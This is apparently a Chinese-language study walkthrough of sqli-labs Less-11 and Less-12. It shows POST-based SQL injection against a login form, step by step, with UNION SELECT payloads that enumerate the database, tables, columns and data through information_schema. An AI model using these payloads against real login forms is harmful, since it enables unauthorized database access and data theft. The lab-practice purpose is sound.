Less-11(报错注入POST方式)
1.判断是否存在注入点
因为是POST 方式的与GET方式稍有不同,可以选择使用burp suite以及火狐的hackbar进行操作,直接在输入框username处输入admin密码随意,得到一个正确的回显
Username处输入admin’密码随意,出现报错
提示在123456处因为 ’ 出现错误,所以尝试在username处输入admin’ #(将密码及后面部分全部注释掉,即为:uname=admin' #&passwd=123456&submit=Submit)(这里不能用--+)
回显正确,判断存在注入点,注入方式为:’’
2.判断回显位数
uname=admin' order by 2#&passwd=1&submit=Submit 经过判断得到回显位数为2
3.爆数据库
uname=-admin' union select 1,database()#&passwd=1&submit=Submit
因为使用union,那么前面部分必须要不存在才行,得到数据库名字为security
4.爆表名
uname=-admin' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #&passwd=1&submit=Submit,如下图,得到数据库下的所有表名
5.爆字段
uname=-admin' union select group_concat(column_name) from information_schema.columns where table_name='emails' #&passwd=1&submit=Submit,发现出现了如下报错的提示:
使用的SELECT语句具有不同数量的列
经过检查发现:回显位是2,但是使用select语句时并没有用两个
修改为:uname=-admin' union select 1,group_concat(column_name) from information_schema.columns where table_name='emails' #&passwd=&submit=Submit
如下图,得到表emails下的所有字段
6.爆数据
uname=-admin' union select 1,group_concat(id) from emails #&passwd=&submit=Submit
如图,得到字段id下的所有数据
-------------------------------------------------------END----------------------------------------------------------------
Less-12(报错注入)
1.判断是否存在注入点
当执行admin 以及admin'时都未出现报错,而执行如下时,出现报错信息
uname=admin"&passwd=admin&submit=Submit
通过分析,当执行uname=admin")#&passwd=&submit=Submit时,回显正常,判断存在注入点,注入方式为:(“”)
2.判断回显位数
uname=admin") order by 2#&passwd=&submit=Submit,经过尝试得到回显位数为2
3.爆数据库
uname=-admin") union select 1,database()#&passwd=&submit=Submit,得到数据库名
4.爆表名
uname=uname=-admin") union select 1, group_concat(table_name) from information_schema.tables where table_schema='security'#&passwd=&submit=Submit
5.爆字段
uname=-admin") union select 1,group_concat(column_name) from information_schema.columns where table_name='uagent'#&passwd=&submit=Submit,表uagent中的数据为空,如下
6.爆数据
因为uagent里的数据都为空,所以还是选择爆emails,比较好观察
uname=-admin") union select 1,group_concat(email_id) from emails#&passwd=&submit=Submit
-------------------------------------------------------END----------------------------------------------------------------